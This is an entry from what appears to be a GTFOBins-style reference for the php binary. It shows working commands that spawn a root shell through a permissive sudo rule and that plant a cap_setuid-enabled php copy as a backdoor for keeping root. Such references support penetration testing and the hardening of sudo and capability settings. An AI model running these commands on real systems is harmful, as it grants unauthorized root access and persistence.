***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * CMD="/bin/sh"
      sudo php -r "system('$CMD');"
***** Capabilities *****
If the binary has the Linux CAP_SETUID capability set or it is executed by
another binary with the capability set, it can be used as a backdoor to
maintain privileged access by manipulating its own process UID.
    * cp $(which php) .
      sudo setcap cap_setuid+ep php

      CMD="/bin/sh"
      ./php -r "posix_setuid(0); system('$CMD');"
